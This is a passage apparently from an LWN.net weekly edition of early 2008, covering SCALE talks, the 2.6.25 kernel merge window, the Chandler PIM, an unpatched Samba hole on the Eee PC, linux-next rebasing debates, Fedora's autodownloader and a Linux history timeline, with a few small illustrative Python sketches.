move up to a higher "rung on the scan ladder" which will allow them to be
scanned by more recent versions of the Coverity tool.


Bdale Garbee had perhaps the geekiest talk of the show on Saturday afternoon with
"Open Avionics for Model Rockets".  Garbee gave an overview of the hobby,
which has gone far beyond the Estes rockets that many of us dabbled with in
our youth.  These rockets can go to 10,000 feet and above; just how high
they go is one of the questions that led folks to start outfitting them
with instruments.  Deploying the recovery system—typically a
parachute—at apogee is very desirable and a barometric sensor with a
little bit of logic tied to the ejection charge can do just that.
Unfortunately, all of the commercially available options for these systems
are completely closed; even the protocol to talk to the
device is not released by the manufacturers.
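
The "little bit of logic" involved can be sketched in a few lines.  What follows is only an illustration in Python, not code from any commercial altimeter or from Garbee's project: the function name, the confirm threshold, and the idea of requiring several consecutive rising readings are all assumptions.  It relies only on the fact that air pressure falls as the rocket climbs and rises again once it begins to descend.

```python
from typing import Optional, Sequence


def detect_apogee(pressures: Sequence[float], confirm: int = 3) -> Optional[int]:
    """Return the index of the sample at which apogee is declared, or None.

    Apogee lies near the minimum pressure reading.  To avoid firing on a
    single noisy sample, `confirm` consecutive readings above the lowest
    pressure seen so far are required before apogee is declared.
    (Hypothetical helper; the threshold is an assumed tuning parameter.)
    """
    lowest = float("inf")
    rising = 0
    for i, p in enumerate(pressures):
        if p <= lowest:
            lowest = p      # still climbing (or level): new minimum
            rising = 0      # any such reading restarts the count
        else:
            rising += 1     # pressure above the minimum: maybe descending
            if rising >= confirm:
                return i    # this is where the ejection charge would fire
    return None
```

A real flight computer would also have to filter sensor noise and cope with the pressure transients of a high-speed ascent; the sketch ignores both.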


Garbee decided to once again combine one of his hobbies with open source to
design and build an open device.  Both the hardware and software will be
released under free licenses (GPL and
Open Hardware License); he had
version 0.1 of the hardware (missing the accelerometer due to a problem in
the board layout) with him at the show.  The AltusMetrum system also has an onboard
barometric sensor and will be able to support things like GPS devices and
radio transmitters—so that lost rockets do not stay lost.  Garbee
expects to flight test the board and design version 0.2 of the hardware
over the coming months.  


Sunday's keynote, by Stormy Peters of OpenLogic, was entitled "Would you do
it again for free?".  Peters looked at whether external rewards, usually
money, affect the motivation of open source developers; in particular, if
the pay stops, will the project work stop as well?  She cited four
separate "studies" (including two that weren't intended as studies) that
seemed to show that adding a reward, or penalty, can sometimes have a counter-intuitive
effect (see an entry
in her weblog for more information).


Peters came to no firm conclusions about what the long-term effects of paying
open source developers would be, but there are some mitigating factors that
seem to provide hope that developers would continue if the paychecks
stopped.  When a payment or reward is in line with expectations for doing
a particular task, it is much less demotivating.  Also, if the payment is
for working on the project, not tied to a specific goal or milestone, it is
also less of a problem.  Both of those are typically the case with folks
who are paid—40% of open source developers are, according to
Peters—for their work in the community.


After a last wander through the show floor, I was able to catch a few
minutes of the talk given by Ken Gilmer and Angel Roman of Bug Labs describing their modular embedded
Linux gadget building system.  The system consists of a core module along
with various plug-in devices (camera, motion detector, GPS, etc.) that can
be combined into a single Java-programmable device.  Many additional peripheral
modules are planned.  The software that runs on the device is free and Bug
Labs has a community site to share application code; they are clearly
hoping that they can foster a community of users and developers.


As can be seen, SCALE offers a wide variety of technical content in a well
organized and fun conference.  It has grown beyond the capacity of the
Airport Westin where it has been held for the last few years; expect a new,
bigger venue somewhere in LA next year.  Over the last few years, SCALE has
drawn from more areas of the southwest US in moving from a small, local
conference to a regional one.  If things continue, in another few years it
may grow into a national conference; one can only hope that if that
happens, it will continue to be as well run and interesting as it is today.


		Before the 2.6.25 merge window closed...


The 2.6.25 merge window closed on February 10, after the merging of an
eye-opening 9450 non-merge changesets.  Most of the changes merged for
2.6.25 were covered in the first and second "what got merged"
articles.  This, the third in the series, covers the final 1900 patches
merged before the window closed.


User-visible changes include:


 There are new drivers for SC2681/SC2691-based serial ports, Dallas
     DS1511 timekeeping chips, AT91sam9 realtime clock devices, Compaq
     ASIC3 multi-function chips, Cell Broadband Engine memory controllers,
     Marvell MV64x60 memory controllers, PA Semi PWRficient NAND flash
     interfaces, Marvell Orion NAND flash controllers, Freescale eLBC NAND
     flash controllers, Sharp Zaurus SL-6000x keyboards, Fujitsu Lifebook
     Application Panel buttons, IPWireless 3G UMTS PCMCIA cards,
     intelligent storage device enclosures, Winbond W83L786NG
     and W83L786NR sensor chips, Texas Instruments ADS7828
     12-bit 8-channel ADC devices, and Sony MemoryStick cards.

 Also added are updated video drivers for Radeon R500 chipsets (2D
     acceleration is now supported) and Intel i915 chipsets (suspend and
     resume now work properly).

 Several more obsolete OSS audio drivers have been removed.  The old
     mxser driver has also been removed in favor of mxser_new, now called
     simply "mxser."

 File descriptors returned by inotify_init() now support
     signal-based (using SIGIO) I/O.  There is also a new
     notification event (IN_ATTRIB) sent when the link count of a
     watched file changes.

 The mac80211 (formerly Devicescape) wireless subsystem is no longer
     marked "experimental."

 The memory use controller for containers has been merged.  This
     controller was described in this LWN article, but the
     patch has evolved somewhat since then and the details have changed.
     Some documentation can be found in Documentation/controllers/memory.txt. 

 ACPI thermal regulation support has been added; see Documentation/thermal/sysfs-api.txt for
     details on how it works.  The ACPI code also now supports the Windows
     Management Instrumentation interface, and uses that support to make
     recent Acer laptops work.

 ACPI now provides support for users who want to override their
     system's Differentiated System Description Table (DSDT).

 The XFS filesystem now supports the fallocate() system call. 

 ATA-over-Ethernet (AoE) now properly supports devices with multiple
     network interfaces (and, thus, multiple paths to the host).

 Support for the MN10300
     architecture (little-endian mode only) has been added.

 Support for a.out binaries has been removed from the ELF loader.  Pure
     a.out systems will still work, though.

 Disk I/O statistics (as seen in /proc/diskstats and under
     /sys/block) have been augmented with more information about
     request merging and I/O wait time.

 The S390 architecture now implements dynamic page tables - processes
     will use 2-, 3-, or 4-level page tables depending on the size of their
     address space.

 The ext4 "in development" flag has been added; mounting an ext4
     filesystem will now require an explicit "I know this might explode"
     option. 
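
For those wanting to look at the disk I/O statistics mentioned above, here is a minimal Python sketch which splits one /proc/diskstats line into named counters.  The field order follows the kernel's Documentation/iostats.txt; the dictionary keys and the function name are invented for this example, and the sample line in the usage note is made up.

```python
from typing import Dict, Union

# Names (chosen for this sketch) for the eleven counters that follow the
# device name, in the order given by Documentation/iostats.txt.
FIELDS = (
    "reads_completed", "reads_merged", "sectors_read", "ms_reading",
    "writes_completed", "writes_merged", "sectors_written", "ms_writing",
    "ios_in_progress", "ms_doing_io", "weighted_ms_doing_io",
)


def parse_diskstats_line(line: str) -> Dict[str, Union[int, str]]:
    """Split one diskstats line into major, minor, device and counters."""
    parts = line.split()
    if len(parts) < 3 + len(FIELDS):
        raise ValueError("not an eleven-counter diskstats line: %r" % line)
    stats: Dict[str, Union[int, str]] = {
        "major": int(parts[0]),
        "minor": int(parts[1]),
        "device": parts[2],
    }
    # Any extra trailing columns are ignored by zip().
    for name, value in zip(FIELDS, parts[3:]):
        stats[name] = int(value)
    return stats
```

Feeding it a line such as "8 0 sda 4512 1203 98764 3320 2210 5407 60936 10480 0 5120 13800" yields the request-merging counts as reads_merged and writes_merged, and the time spent doing I/O as ms_doing_io.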


Changes visible to kernel developers include:


 Many nopage() methods have been replaced by the newer 
     fault() API; the near-term plan is to remove
     nopage() altogether.  See this article for a
     description of the new way of "page not present" handling.

 This cycle has also seen a bit of a reinvigoration of the long-stalled
     project to eliminate the big kernel lock.  A number of BKL-removal
     patches have been merged, with more certainly to come.

 A generic resource counter mechanism was merged as part of the memory
     controller patch set; see <linux/res_counter.h> for the
     details. 

 reserve_bootmem() has a new flags parameter.  Most
     callers will set it to BOOTMEM_DEFAULT; the kdump code,
     though, uses BOOTMEM_EXCLUSIVE to ensure that it is the only
     one to touch the memory.

 Most architectures now have support for cmpxchg64() and
     cmpxchg_local(). 

 There is a new set of string functions:


     These functions convert the given strings to various forms of
     long values, but they will return an error status if the
     given string value, as a whole, does not represent a proper
     integer value.  These functions are now used in the parsing of kernel
     parameters. 
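
The difference between lenient and strict string conversion, as described in the last item above, can be illustrated with a user-space analogy.  The Python below is not the kernel code: both function names are hypothetical, only decimal input is handled, and returning -EINVAL as the error status is an assumption made for the example.

```python
import errno
from typing import Tuple

DIGITS = "0123456789"


def _split_sign(text: str) -> Tuple[int, str]:
    """Strip one optional leading sign; return (sign, remainder)."""
    if text[:1] == "-":
        return -1, text[1:]
    if text[:1] == "+":
        return 1, text[1:]
    return 1, text


def lenient_parse_long(text: str) -> int:
    """Convert the leading digits and silently ignore whatever follows."""
    sign, rest = _split_sign(text)
    digits = ""
    for ch in rest:
        if ch not in DIGITS:
            break
        digits += ch
    return sign * int(digits) if digits else 0


def strict_parse_long(text: str) -> Tuple[int, int]:
    """Return (status, value); status is 0 only if the whole string
    is a proper integer, and -EINVAL (assumed) otherwise."""
    sign, rest = _split_sign(text)
    if not rest or any(ch not in DIGITS for ch in rest):
        return -errno.EINVAL, 0
    return 0, sign * int(rest)
```

Given "123abc", the lenient version quietly returns 123 while the strict version reports an error; for something like a kernel parameter, the second behavior is usually what is wanted.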


At this point, the merging of features is done (though there has been a bit
of pushing for one or two things to slip in) and the stabilization period
begins.  With luck, that process will go a little more quickly than it did
with 2.6.24.

		The Chandler Project moves forward


The Chandler Project
is a small-group collaboration application that is being produced
by the non-profit Open Source Applications Foundation (OSAF).
OSAF was founded by Mitchell Kapor.  The foundation's History
document reveals some background information.
The project has been under development for a number of years.
Version 0.1 of Chandler was announced in April, 2003.


From the Chandler FAQ entry on "What is Chandler?":


Chandler Project is an open source, standards-based personal information manager (PIM) built around small group collaboration and a core set of information management workflows modelled on Inbox usage patterns and David Allen's GTD (Getting Things Done) methodology.
See Vision for a more in-depth answer to this question.


Chandler provides an all-inclusive view of personal information;
it can operate on notes, email, tasks, appointments, events,
contacts, documents and additional personal resources.
The Chandler Desktop application provides a single user interface
with the ability to enter, view, search, group and share all
of the supported types of information.
The software is cross-platform; it currently runs on the Linux, Windows
and Macintosh platforms.
The Chandler software is being distributed under version 2.0 of the
Apache Software License.


The Chandler features document explains how the project is arranged:


Chandler consists of a cross-platform (Windows, Mac OS X and Linux) Chandler Desktop application and
Chandler Hub,
a sharing service and web application. Chandler is open source and standards-based.


The FeatureList document covers the Chandler capabilities in
more detail; some screenshots are included.
OSAF provides free access to the Chandler Hub; information there is
available to any user with an account and a web browser.
The Chandler Server provides a central store for locally
managed information.
There are some demo movies that show Chandler in action.
The project explains some of the basic Chandler concepts and terms:


Item: Chandler has four kinds of items: Note, Message, Task and Event. Chandler items can be of multiple kinds, e.g. Scheduled Tasks and Invitations.
Collection: Chandler's primary mechanism for grouping items. Collections can contain items of any kind.
Application Area: Chandler has four application areas: Mail, Tasks, Calendar and an all-inclusive All area. Chandler's application areas are a way to filter down your collections by item kind.
Triage Status: An attribute on every item that is Chandler's principle mechanism for helping you manage what you're working on. The three triage statuses are NOW, LATER and DONE.
Tickler Alarm: A custom alarm you can set on any item to automatically triage that item to NOW at a time you specify.
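
The interaction between triage status and tickler alarms described above can be modeled in a few lines of Python.  This is a sketch of the concepts only and is not taken from Chandler's source: the class and method names are invented, and the choice of NOW as the default status for a new item is an assumption.

```python
from dataclasses import dataclass
from datetime import datetime
from enum import Enum
from typing import Optional


class Triage(Enum):
    NOW = "NOW"
    LATER = "LATER"
    DONE = "DONE"


@dataclass
class Item:
    """A hypothetical item carrying a triage status and optional tickler."""
    title: str
    triage: Triage = Triage.NOW          # assumed default
    tickler: Optional[datetime] = None   # when to re-triage to NOW

    def tick(self, now: datetime) -> None:
        """Fire the tickler alarm if its time has come."""
        if self.tickler is not None and now >= self.tickler:
            self.triage = Triage.NOW
            self.tickler = None          # an alarm fires only once
```

An item filed as LATER with a tickler set for the first of March stays out of the way until then; the first tick() call at or after that time moves it back to NOW.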


Two new releases were recently announced,
Chandler Desktop 0.7.4
and
Chandler Server 0.12.0.
The new Chandler Desktop change summary says:
"The 0.7.4 release adds a Tip of the day feature and a German
translation contributed by a user. The triage status behavior was
improved to be more useful. There have been dozens of bug fixes across
the application, as well as fixes to the build and testing
infrastructures."  The new Chandler Server change summary says:
"This release supports a standalone WAR form of Cosmo ready to
drop in to an existing Tomcat installation.  A security issue
allowing unauthorized access when a collection had been shared was
fixed.  A number of smaller bugs have also been fixed for
Unicode usernames, error logging, and the calendar web UI."


Chandler is in an active phase of development.  The software has evolved
from an interesting concept to a functioning system in recent years.
Organizations and individuals who have a need for some advanced
management and communications capabilities should be able to
find some benefits from using Chandler.


		Eee PC security or lack thereof


The Eee PC has garnered a lot of press
for its small form factor, low weight, and solid-state disk, but it has
also made a poor showing with security researchers.  RISE Security released
a report on the security of
the Eee last week, showing that it can be subverted ("rooted") right out of
the box from ASUS.  Unfortunately, it is even worse than that as, even after
updating an Eee using the standard mechanism, the hole is not patched. 


The vulnerability identified by RISE is in the Samba daemon (smbd), version
3.0.24, which is installed and runs on stock Eee PCs.  The vulnerability, CVE-2007-2446,
was identified and patched last May, so the Eee is shipping with a version
of Samba that has been known to be vulnerable to an arbitrary code execution flaw for
nine months or so.  In itself, that is not completely surprising.


When hardware vendors install a distribution—or commercial OS like
Windows—they tend to install the latest released version, which is likely to be out of date with respect to security
issues.  A vendor installing Fedora 8 or Debian etch today will be behind
on countless security updates.  But, unlike the Samba problem discovered on
the Eee, updates do exist in the standard places.  If the new user updates
their system immediately, there is a fairly small window of vulnerability.


Unfortunately for Eee owners, the modified Xandros distribution that comes
with it does not yet have an update for Samba.  This leaves all Eee PCs
vulnerable to being rooted by anyone on the same network.  Since the Eee is
meant as a mobile device, it likely spends a lot of its time connected to
various public networks, especially wireless networks.  The Eee makes an
interesting target for attackers because it very well might have
authentication information for banks or brokerages as well as other private
or confidential files.


Some have seriously
downplayed the threat but it is clear they don't understand it:

The root attack performed was relatively easy to do, if you like command
lines.  Maybe Asus or Xandros could work on a patch for this.  It almost
makes one wonder how many other exploits are lying under the surface just
waiting to be found.  But, it's not like this actually puts you in danger,
just how many hackers are going to be looking for the Asus EeePC or even
Xandros based system online and attack them?  Probably not many. 


Sales of the Eee last year were around 300,000 units, large
enough to be an attractive target for the malicious.  Because there is not an
update to close the hole, Eee users have to rely on other means to protect
themselves.  This eeeuser.com
comment thread provides some of the better advice for dealing with the
problem.  Removing the Samba package seems to be the simplest, if fairly
heavy-handed, way to avoid the hole, but many folks need a working
Samba.  There is no way to disable Samba from the Eee GUI, which is the way
most owners plan to interact with the machine.  This whole incident makes
it seem like ASUS (and perhaps Xandros) are not terribly interested in the
security of the machines that they sell.


There is a larger issue here.  When security patches normally arrive
over the same medium that is also the biggest security
threat, there will always be windows of vulnerability.  Even if hardware vendors
diligently update the distribution they install, there is still some
shelf-life and shipping time during which security updates can be
released.  Various studies have shown that
there may not be enough time to download patches before an unpatched
system succumbs to an attack.  


It is a difficult problem to solve completely. Any solution must be very
straightforward and consistent so that unsophisticated users can be trained
to do it as a matter of course.  News about security issues needs to get
more widespread attention as well, so that those same users know
when the procedure needs to be followed.  Firewalls and other
network protections only go so far if the machine needs to reach out to the
internet to pick up its updates.

 If distributions provided some kind of blob (tar file, .deb, .rpm,
etc.) that contained all of the security updates since the release, users
could grab that from a different (presumably patched or not vulnerable)
machine, put it on a USB stick or some other removable media and get it to
the new machine.  A utility provided by the distribution could then process
that blob to apply all the relevant patches—all while the vulnerable
machine stayed off the net.  As the world domination plan continues,
threats against Linux will become more commonplace; we need to try to
ensure that users, especially the unsophisticated ones, can be secure in
their choice of Linux.  

		linux-next and patch management process


The kernel development process operates at a furious pace, merging
on the order of 10,000 changesets over the course of a 2-3 month
release cycle.  There have been many changes over the last few years which
have helped to make this level of patch flow possible, and the process has
been optimized significantly.  An ongoing discussion on the kernel mailing
list has made it clear, though, that a truly optimal solution has not yet
been found.


It started with the announcement
of the linux-next tree.  This tree, to be maintained by Stephen
Rothwell, is intended to be a gathering point for the patches which are
planned to be merged in the next development cycle.  So, since we are
currently in the 2.6.25 cycle, linux-next will accumulate patches for
2.6.26.  The idea is to solve the patch integration issues there and reduce
the demands on Andrew Morton's time.


The question which was immediately raised was this: how do we deal with big
API changes which require changes in multiple subsystems?  These changes
are already problematic, often requiring maintainers to rework their trees
in the middle of the merge window.  Trying to integrate such changes
earlier, in a separate tree, could bring a new set of problems.  There will
be a lot of conflicts between patches done before and after the API change,
and somebody is going to have to put the pieces back together again.
Andrew does some of that now, but the problem is big enough that not even
Andrew can solve it all the time.  The bidirectional SCSI patches merged
for 2.6.25 were held up as an example; that
change required coordinated SCSI and block layer patches, and it never was
possible to get the whole thing working in -mm.


Arjan van de Ven asserted that the only way
to make large API changes work is to merge them first, at the beginning of
the merge window.  The merged patch would fix all in-tree users of the
changed API, as is
the usual rule.  Maintainers of all other trees could then merge with the
updated mainline, fixing any new code which might be affected by the API
change.  This is, essentially, the approach which was taken for the big
device model changes in 2.6.25; they hit the mainline at the beginning of
the merge window, then everybody else got to adapt to the new way of doing
things.


Greg Kroah-Hartman worries that this approach
is not sufficient, especially when live trees are being merged.  If an
API change in one tree forces a change to a separate tree, the coordination
issues just get hard.  Keeping the secondary changes in the primary tree
risks conflicts with patches in the proper subsystem tree.  Patches which
reach across trees are also, increasingly, being discouraged as making life
harder for everybody.  But the fixup patch will not apply to its nominal subsystem
tree as long as the API change itself is not there.  In the -mm tree, this
sort of problem is glued together by a series of fixup patches maintained
by Andrew; Greg says that the linux-next tree would need something similar.


David Miller's suggestion was to resolve
this sort of conflict through frequent rebasing of the -next tree.
Rebasing is an operation (supported by git and other code management tools)
which takes a set of patches against one tree and does what's required to
make them apply to a different version of the tree.  It can be quite useful
for maintaining patches against a moving target - which kernel trees tend
to be.  David talked about how he rebases his (networking subsystem) trees
frequently as a way of eliminating conflicts with the mainline and, in the
process, cleaning some cruft out of the development history.


It turns out, though, that this frequent rebasing is not popular with the
developers who are downstream of David.  Rebasing the tree forces all
downstream contributors to do the same thing, and to deal with any merge
conflicts that result.  It makes it much harder to prepare trees which can
be pulled upstream and creates extra work.
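
A toy model shows why a rebase ripples downstream.  The Python below is a deliberate simplification and not how git is implemented: real commit IDs also cover the tree contents, author, and commit message, and a real rebase may change the patches themselves while resolving conflicts.  All names are invented for the example.  The one property it preserves is that a commit's identity depends on its parent, so replaying the same patches on a new base gives every one of them a new ID.

```python
import hashlib
from typing import List, Tuple

Commit = Tuple[str, str]  # (commit id, patch text)


def commit_id(parent_id: str, patch: str) -> str:
    """Derive an ID from the parent's ID and the patch (toy model)."""
    data = (parent_id + "\n" + patch).encode("utf-8")
    return hashlib.sha1(data).hexdigest()


def apply_series(base_id: str, patches: List[str]) -> List[Commit]:
    """Stack patches on a base, chaining each commit to the previous one."""
    history: List[Commit] = []
    parent = base_id
    for patch in patches:
        parent = commit_id(parent, patch)
        history.append((parent, patch))
    return history


def rebase(history: List[Commit], new_base_id: str) -> List[Commit]:
    """Replay the same patches, in order, on top of a different base."""
    return apply_series(new_base_id, [patch for _, patch in history])
```

If a downstream developer has built on the last commit of the original series, that commit no longer exists in the rebased tree; the downstream work must be replayed in turn.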


This was where Linus jumped into the
conversation and expressed his dislike of rebasing.  He echoed the
complaints from downstream developers that a constantly-rebased tree is
hard to prepare patches against.  It also confuses the development history,
making changes to other developers' patches in silent ways.  After
somebody's patch set has been rebased, it is no longer the patches that
were sent.  So, says Linus:


	So there's a real reason why we strive to *not* rewrite
	history. Rewriting history silently turns tested code into totally
	untested code, with absolutely no indication left to say that it
	now is untested.


It is about here that Andrew Morton commented that git does not appear to be
matching entirely well with the way that kernel developers work.  Some of
the solution may be found in tools more oriented toward the management of
patch queues - such as quilt.  There may be a renewed push to get more
quilt-like functionality built into git (along the lines of the stacked git project) in the near
future.


Linus is also not entirely pleased with how
the integration of patches only happens in the mainline:


	I'm also a bit unhappy about the fact you think all merging has to
   	go through my tree and has to be visible during the two-week merge
   	period. Quite frankly, I think that you guys could - and should -
   	just try to sort API changes out more actively against each other,
   	and if you can't, then that's a problem too.


His suggestion is that a separate git tree should be created to contain a
large API change - and nothing else.  Affected subsystem maintainers could
then merge that tree and develop against the result.  In the end, all of
the pieces should merge nicely in the mainline.

This approach raises a number of interesting issues.  The API-change tree
has to be agreed upon by everybody, and it must be quite stable - lots of
changes at that level will create downstream trouble.  There must also be a
high degree of confidence that this API-change tree will, in fact, get
merged into the mainline; should Linus balk, everybody else's trees will no
longer be applicable to the mainline.  Replacing the current "tree of
trees" patch flow with something messier could create a number of
coordination issues.  And there are fears that a mainline tree built from
this process would fail to build in many of its intermediate states, which
would make tools like "git bisect" much harder to use.  Even so, it could
be part of the long-term solution.


Linus also took the opportunity to complain about large-scale API changes
in general:


	Really. I do agree that we need to fix up bad designs, but I
   	disagree violently with the notion that this should be seen as some
   	ongoing thing. The API churn should absolutely *not* be seen as a
   	constant pain, and if it is (and it clearly is) then I think the
   	people involved should start off not by asking "how can we
   	synchronize", but looking a bit deeper and saying "what are we
   	doing wrong?"


He also stated that the costs of big API
changes are high enough that we should, more often, stay with older
interfaces, even if they are not as good as they could be.  Others disagreed, claiming that Linux must continue
to evolve if it is to stay alive and relevant.  


The rate of change seems unlikely to fall in the near future.  There may be
some changes to how big changes are done, though.  As suggested by Ted Ts'o, more changes could be
done by creating entirely new interfaces rather than breaking old ones.
With Ted's scheme, the old interface would be marked "deprecated" at the
beginning of the merge window.  Developers would then have the entire
development cycle to adjust to the change, and the deprecated interface
would be removed before the final release.


There is resistance to this approach, based on the observation that getting
rid of deprecated interfaces tends to be harder than one would expect.
But, still, it is a relatively painless way of making changes.  The current
transition (in the memory management area) from the nopage() VMA
operation to fault() is an example of how it can work.  Nick
Piggin has been slowly changing in-tree users with the eventual goal of
removing nopage() altogether.  For now, though, both interfaces
coexist in the tree and nothing has been broken.
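
The coexistence pattern can be sketched outside the kernel as well.  The Python below is only an analogy: the function names are invented, the bodies are placeholders, and the standard warnings module stands in for whatever marking mechanism a project actually uses.  The old entry point survives as a thin wrapper around the new one, so existing callers keep working while being told to move.

```python
import warnings


def handle_fault(address: int) -> str:
    """New-style interface (hypothetical placeholder body)."""
    return "page for 0x%x" % address


def handle_nopage(address: int) -> str:
    """Old-style interface, kept as a deprecated wrapper for now."""
    warnings.warn(
        "handle_nopage() is deprecated; use handle_fault()",
        DeprecationWarning,
        stacklevel=2,   # attribute the warning to the caller
    )
    return handle_fault(address)
```

Once the last caller of the old function has been converted, the wrapper can be deleted without breaking anything; the hard part, as noted above, is getting to that point.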


Like the kernel itself, its development process is undergoing constant
change and (hopefully) improvement.  As the development community and the
rate of change continue to grow, the process will have to adjust
accordingly.  What changes come out of this discussion remains to be seen.
But it's worth noting that Andrew Morton fears that the biggest problem - regressions
and bugs - will be relatively unaffected.

		Autodownloading considered harmful


A Fedora user recently asked: might it be
possible for the project to put together a package which would
automatically download and install the (proprietary) Google Earth
application?  Debian has googleearth-package,
which makes an installable package from the downloaded application, but
there is no such convenience for Fedora users.  The quick answer appeared
to be "no" - Fedora is for free software only, and packaging tools for
proprietary programs do not fit the bill.


It did not take long for others to point out the "autodownloader" facility
shipped with the Fedora games spin now.  This tool is needed to make
certain games work where the game is free software, but it needs
proprietary data to provide the full experience.  Games like Quake3 and
Rise of the Triad fit this description.  With autodownloader, these games
can be shipped with Fedora and the proprietary data will be fetched
automatically on the destination machine.  This scenario does not seem all
that different than downloading a proprietary application like Google Earth
and installing it.


The difference, as seen by the Fedora camp, is that autodownloader can only
obtain data, not code.  The fact that much of that data may, in
fact, be code which is fed to a virtual machine within the game is sort of
glossed over.  In the discussion, it was also suggested that games
requiring autodownloader should come with enough free data to be minimally
usable, though that does not seem to have been enforced with great vigor.
Alan Cox's suggestion that the real test
should be "is it possible to create free data for this game?" makes some
sense, but that is not the operative rule now.


Such a discussion cannot go on long, though, before somebody brings up the
real sore point: CodecBuddy.  This time, it was Hans de Goede who raised the issue:


	Not only does it automatically download some gratis closed source
	code, it even offers the user to buy closed source code,
	effectively free advertising for commercial closed source!


According to Hans, there is no point in discussing autodownloader as long
as CodecBuddy remains in the repository.

Outgoing Fedora leader Max Spevack is trying to organize a discussion aimed
at reaching some sort of clarity on these issues.  Christopher Blizzard had
an interesting idea: hand more of the
decisions about (and responsibility for) the shipping of problematic code
to the upstream projects.  The Miro
project was held up as an example.  Christopher's proposal has some echoes
of the disintermediation of
distributions discussion which was covered here last week.  When it
comes to patent-encumbered codecs, distributions like Fedora would happily
accept disintermediation.

In the absence of a real solution to the patent problem, some sort of
disintermediation may be the only workable answer for distributions like
Fedora.  They may not be willing to ship the code, but others are.  So it's
mostly just a matter of making the connection between those repositories
and the users as straightforward and painless as possible.  Spending time
with search engines to find useful programs or data may build character,
but it does not help create a useful or pleasurable Linux user experience.

		Ten-year timeline part 6: almost to the present


Part 5 of this increasingly
long series stopped in March, 2004, when BitMover loudly proclaimed that
the use of BitKeeper had doubled the pace of kernel development.  This
installment picks up from there, looking at a year when BitKeeper remained
in the news, the SCO case was in progress, software patents became more
threatening, and more.


 April 8, 2004: The first
     X.org release.  SELinux shows up in a Fedora Core 2 test
     release.  Red Hat v. SCO is put on indefinite hold (where it remains
     to this day).  Anti-software-patent demonstrations are held in
     Europe. 


This week featured some important news.  The launch of X.org signaled the
resurrection of Linux desktop work and the beginning of a much more
interesting and promising era.  Meanwhile, Fedora took the lead in pushing
SELinux-based mandatory access control technology into a general-purpose
system.  That work is still very much in progress nearly four years later,
but, like it or not, SELinux has become an important part of our defensive
arsenal.


 April 15, 2004: The 2.6.6
     kernel gains POSIX message queues, filesystem speedups, internal API
     changes, laptop mode, 4K stacks, auditing, the CFQ I/O scheduler,
     and more.  Sun and Microsoft
     make a $2 billion deal.  Lindows becomes Linspire.

 April 22, 2004: Linspire
     files to go public.  BayStar tells SCO it wants its money back.

 April 29, 2004: Gentoo
     founder Daniel Robbins leaves the project.


Something else which was going on during this time was a rising level of
discontent over the management of the Fedora project, which was not turning
out to be the open community that many had hoped for.  Pause for a moment
and revisit this classic
dialog posted by Konstantin Ryabitsev, which so clearly documented how
the situation was seen by the community at that time.  Fedora has come a
long way since then.


 May 20, 2004: The
     European Council approves the software patent directive, sending it
     back to the Parliament for final passage.  


Remember: the directive approved by the Council was the original
version which legitimized software patents, not the version amended by the
Parliament which did not.  Thus started the final (so far) round in the
fight against European software patents - a round which we eventually won.


 May 27, 2004: The kernel
     adopts the Signed-off-by: convention.  The 2.6.7 kernel gains
     scheduling domains, the object-based reverse mapping VM, filtered
     wakeups, and more.


The thing to remember here is that 2.6 was alleged to be a stable kernel
series, and everybody was still waiting for 2.7 to start.  Linus defended
the massive VM changes with the claim that they were, in fact, an
"implementation detail."  The realization that the kernel development
process had, in fact, already changed did not come through until...


 July 22, 2004: The "new"
     kernel development process is adopted.


This kernel summit decision - which, among other things, said that there
would be no 2.7 kernel - surprised almost everybody.  Certainly there have
been some issues since then, but nobody really wants to go back to the old,
pre-2.6 days.


 August 5, 2004: Open
     Source Risk Management funds a study showing that the kernel infringes
     on 283 patents, offers patent suit insurance.  SCO Forum is held,
     featuring a keynote by Rob Enderle; the rest of the world looks on
     incredulously.  The Munich Linux deployment is put on hold as a result
     of software patent fears.

 August 19, 2004: Linspire
     gives up on its IPO.  The 2.6.8.1 kernel is released.


There were interesting cross-currents happening at this time.  On the one
hand, companies like Open Source Risk Management were trying to use SCO as
a way to scare companies (and individual developers) into buying its
insurance offerings.  On the other, there was a hallucinogenic aspect to
the SCO Forum discussions that escaped nobody; SCO's time of being taken
seriously by the wider world was already done.  

It's worth noting that OSRM still exists, but its insurance offering now
is for companies worried about GPL-infringement suits.

Meanwhile, 2.6.8.1 was the first three-dot kernel release ever; it was
rushed out in response to an unpleasant, last-minute bug in 2.6.8.


 August 26, 2004: IBM
     brings GPL-infringement charges against SCO.  LWN fails to reproduce
     the posted reiser4 filesystem benchmarks, gets in trouble with
     Namesys. 

 September 16, 2004: Sun
     announces plans to open-source Solaris.  OSDL and the Free Standards
     Group announce a plan for cooperation on the Linux Standard Base.


OSDL and the FSG were, at this point, separate groups which, at times,
almost seemed to be in competition with each other.  Those days, of course,
are no more: the two have since merged and become the Linux Foundation.


 September 23, 2004: the
     Ubuntu distribution announces its existence.


Who would have thought that one could create a major new distribution in
2004?  One might well wonder whether the situation is any less open now.


 October 7, 2004: the
     bnetd developers lose their DMCA case.  Concerns about kernel quality
     are expressed.  Microsoft's FAT patent is overturned.

 October 14, 2004: Novell
     says it will use its patents "as appropriate" to defend free software
     projects against patent attacks.  Jeff Merkey offers $50,000 for the
     right to take the kernel proprietary.  The realtime preemption patch
     set gets started.

 October 21, 2004: the
     first Ubuntu release (4.10) comes out.  Busybox 1.0 is released at
     last.  Mozilla begins fund raising to advertise Firefox in the New
     York Times.

 November 11, 2004:
     Firefox 1.0 is released.  Novell gets $500 million in anti-trust cash
     from Microsoft.


The Firefox 1.0 release was, in a very real sense, the much-delayed
culmination of the process which began back in 1998, when Netscape
announced that it would be releasing its code.  Firefox was almost seven
years in the making, but, sometimes, late really is better than never.
Even those of us who use a different browser should be thankful for the
effect Firefox has had toward the creation of a standard-compliant web and
a competitive environment for web browsers.


 November 18, 2004: the
     Linux Core Consortium is formed by Conectiva, MandrakeSoft, Progeny,
     and Turbolinux.

 December 2, 2004:
     MandrakeSoft turns a profit.


Whether it's called United Linux, the Linux Core Consortium, or Manbo-Labs,
this is an idea which returns on occasion: pool effort on the creation of a
base distribution so that each player can concentrate their differentiation
efforts on the higher levels.  It often seems not to work, though.  It is
hard to compete with more community-based distributions through the
establishment of a base platform by corporate fiat.  It seems that the true
"base" distributions have names like Debian or Fedora.


 January 13, 2005: Debian
     runs afoul of the Mozilla trademark policy.  The European Parliament
     attempts to restart the software patent discussion from the
     beginning. 

 January 27, 2005: Sun
     starts releasing Solaris code under the CDDL.  

 February 3, 2005: The
     Software Freedom Law Center is founded.  Eben Moglen starts talking
     about GPLv3.  Russ Nelson becomes the president of the Open Source
     Initiative - briefly.

 February 10, 2005: IBM's
